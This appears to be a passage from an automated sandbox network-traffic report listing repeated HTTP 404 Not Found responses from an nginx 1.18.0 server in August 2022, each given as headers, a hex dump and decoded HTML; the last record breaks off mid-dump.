Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:29 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:30 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:31 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:32 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:33 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:36 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 15 Aug 2022 16:32:37 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Raw: (564-byte hex dump of the body shown in Data Ascii)
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 